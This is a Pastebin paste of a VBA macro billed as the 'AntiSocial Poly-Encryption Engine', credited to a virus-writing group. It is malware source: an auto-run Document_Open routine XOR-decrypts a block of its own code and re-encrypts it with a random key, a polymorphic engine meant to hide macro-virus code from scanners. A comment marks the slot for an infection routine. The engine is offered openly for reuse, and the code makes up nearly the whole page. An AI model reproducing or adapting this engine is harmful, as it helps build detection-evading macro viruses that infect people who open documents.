Advertisement
FlyFar

APEE.vbs

Mar 16th, 2023
1,538
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 1.04 KB | Cybersecurity | 0 0
  1. '
  2. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3. '          AntiSocial Poly-Encryption Engine v.1.0
  4. 'By Lys Kovick For The Alcoholic Anarchists of America (AAA)
  5. '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6. '
  7.  
  8. Private Sub Document_Open()
  9. For V1 = 17 To 28 '//Adjust V1 For Line Changes!
  10. V2 = Null
  11. V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
  12. V4 = Asc((Mid(V3, 2, 1)))
  13. V5 = V4 Xor 39
  14. For V6 = 3 To Len(V3)
  15. V7 = Asc(Mid(V3, V6, 1)) Xor V5
  16. V2 = V2 & Chr(V7)
  17. Next V6
  18. V8 = V2
  19. ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8
  20. Next V1
  21. Call VM
  22. End Sub
  23. Private Sub VM()
  24. For V1 = 17 To 28 '//Adjust V1 For Line Changes!
  25. V2 = Null
  26. V3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1))
  27. V4 = Int(Rnd() * 8) + 1
  28. For V5 = 1 To Len(V3)
  29. V6 = Asc(Mid(V3, V5, 1)) Xor V4
  30. V2 = V2 & Chr(V6)
  31. Next V5
  32. V7 = V2
  33. ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, "'" & V7
  34. Next V1
  35. '//Put Infection Routine Here...
  36. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement